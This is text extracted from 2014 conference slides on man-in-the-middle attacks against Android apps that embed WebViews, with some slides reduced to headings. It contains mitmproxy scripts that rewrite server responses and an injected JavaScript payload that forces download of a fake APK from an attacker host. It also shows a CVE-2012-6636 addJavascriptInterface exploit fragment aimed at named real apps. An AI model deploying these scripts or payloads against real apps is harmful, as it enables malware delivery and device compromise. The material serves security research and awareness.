The Developer's Conference 2014

Ataques MITM a Aplicativos Android

Abusando da confiana dos desenvolvedores

Ivan Joker Jeukens

Motivation

Many apps have built in web browser capabilitiesWebView, ChromeWebView, etc, classes

HTML, Javascript

Can we inject executable code in an app ?

AdvantagesWe have the client code !

Ofuscation is not really known/used by most developers

Messing with the server app communication, not about grabbing cookies etc

UsefulnessDirected attacks

The Developer's Conference 2014

Lab setup & tools

Android SDK AVD Android 4.0.3 CPU/ABI Intel Atom

mitmproxy.orgPython scripts for manipulating requests and responses

code.google.com/p/android-apktool/Decompile into smali code

github.com/egirault/googleplay-api.gitapi for interacting with google store (download apps from scripts)

The Developer's Conference 2014

MITM Script

def response(ctx, flow): if flow.response.content != None and isXml(flow.response.headers['Content-Type']): etype = flow.response.headers['Content-Encoding']; flow.response.decode()

parser = etree.XMLParser(strip_cdata=False) root = etree.XML(flow.response.content, parser)

...

flow.response.content = etree.tostring(root, encoding='UTF-8') flow.response.headers['Content-Encoding'] = etype; if 'gzip' in etype: flow.response.encode('gzip')

The Developer's Conference 2014

MITM Script cont

if flow.response.content != None and (isJson(flow.response.headers['Content-Type']) or isJavascript(flow.response.headers['Content-Type']) ):

etype = flow.response.headers['Content-Encoding']; flow.response.decode() jsondata = json.JSONDecoder(strict=False).decode(flow.response.content) ... flow.response.content = json.JSONEncoder().encode(jsondata) flow.response.headers['Content-Encoding'] = etype; if 'gzip' in etype: flow.response.encode('gzip')

elif flow.response.content != None and isHtmlText( flow.response.headers['Content-Type'] ): etype = flow.response.headers['Content-Encoding']; flow.response.decode() htmldata = BeautifulSoup(flow.response.content) body = htmldata.body ... r = htmldata.prettify(formatter=None) flow.response.content = r.encode('ascii','ignore')

flow.response.headers['Content-Encoding'] = etype; if 'gzip' in etype: flow.response.encode('gzip')

The Developer's Conference 2014

Payload 1

Simple Social Engineering for malware distribution

Veja magazine news reader

The Developer's Conference 2014

Payload 1

The Developer's Conference 2014

Payload1

.class public Lcom/matera/veja/ui/StoryDetail; .

.method private createWebView()V .

The Developer's Conference 2014

The Developer's Conference 2014

The Developer's Conference 2014

Payload 1

Some lame javascript

payloadveja = ' function fase2() { var img = document.getElementById("chupacabra"); img.src = "http://joker.com/vejadown.jpg"; }

function goDown() { var link = document.createElement("a"); link.href = "http://joker.com/com.matera.veja.apk"; if(document.createEvent) { var e = document.createEvent("MouseEvents"); e.initEvent("click" ,true ,true); link.dispatchEvent(e); } setTimeout( fase2, 3000 ); } '

The Developer's Conference 2014

Payload 2

CVE-2012-6636 03/02/2014The Android API before 17 does not properly restrict the WebView.addJavascriptInterface() method

In theory , affects android < 4.2Versions 2.3.X doesn't work

Some 3.X also difficult

Adobe Reader /data/data/br.com.gabba.Caixa/pwnd.txt']);

WebSettings webSettings = browser.getSettings();webSettings.setJavaScriptEnabled(true);browser.addJavascriptInterface(new JsInvokeClass(), "Android");

The Developer's Conference 2014

Payload 2

Android > 4.2annotation @JavascriptInterface method wise

My statistics on this vuln (googleplay-api for downloading the apps)Googleplay-api script downloads the 100 most popular free apps for all categories.

2379 Apps downloaded apps 922 have addJavascript Interface 339 (14%) don't use @JavascriptInterface

The Developer's Conference 2014

Payload 2

.class public Lbr/com/gabba/Caixa/CaixaWebViewActivity;.super Landroid/app/Activity;.const-string v7, "Android"

invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V.const-string v7, "HTMLOUT"

invoke-virtual {v5, v6, v7}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V

The Developer's Conference 2014

The Developer's Conference 2014

Payload 3

SimplerInstead of injecting code, just mess with the html links

The Developer's Conference 2014

The Developer's Conference 2014

Payload 3

The Developer's Conference 2014

The Developer's Conference 2014

Feasibility

These attacks require:Setup mitmwifi range

Either a rogue ap, public probe attack

vuln soho router

Some recon of your target apps

Catch the requests

The Developer's Conference 2014

Conclusions

Apps normally don't validate their data

Https is the only solution used to prevent these attacks

The Developer's Conference 2014

Thanks for watching

ivanjokerbr@gmail.com

ivanjokerbr.github.io

github.com/ivanjokerbr/

www.slideshare.net/ivanjokerbr